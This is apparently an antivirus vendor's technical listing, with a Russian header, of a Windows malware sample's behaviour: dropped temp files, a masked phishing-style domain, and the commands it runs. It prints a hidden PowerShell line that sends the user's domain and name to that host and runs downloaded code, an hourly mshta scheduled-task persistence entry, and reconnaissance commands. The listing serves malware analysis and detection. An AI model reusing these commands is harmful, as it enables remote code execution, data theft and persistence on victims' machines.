Техническая информация
- <SYSTEM32>\tasks\usernetes
- \http://pa#.####r.com-loginset.pw/home/?ne########
- %TEMP%\wefds234\cominfo.txt
- %TEMP%\sd54g2\traea
- %TEMP%\sd54g2\traeb
- %TEMP%\sd54g2\traec
- %TEMP%\wefds234\cominfo.txt
- %TEMP%\sd54g2\traea
- %TEMP%\sd54g2\traeb
- http://pa#.####r.com-loginset.pw/home/?ch#################
- http://pa#.####r.com-loginset.pw/home/?ie#################
- http://pa#.####r.com-loginset.pw/home/?Ne#################
- DNS ASK pa#.####r.com-loginset.pw
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden "$Enc=[uri]::EscapeDataString([Environment]::UserDomainName+$env:USERNAME.Substring(0, 2));iex (New-Object System.Net.WebClient).DownloadString(\"http://pa#.####r.com-log...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /tr "mshta %APPDATA%\UserDis.hta" /tn UserNetEs /st 01:10 /sc hourly /f
- '%WINDIR%\syswow64\schtasks.exe' /delete /tn UserNetEn /f
- '%WINDIR%\syswow64\systeminfo.exe'
- '%WINDIR%\syswow64\ipconfig.exe'
- '%WINDIR%\syswow64\netstat.exe' -ano
- '%WINDIR%\syswow64\tree.com' /f A:\
- '%WINDIR%\syswow64\tree.com' /f B:\
- '%WINDIR%\syswow64\tree.com' /f C:\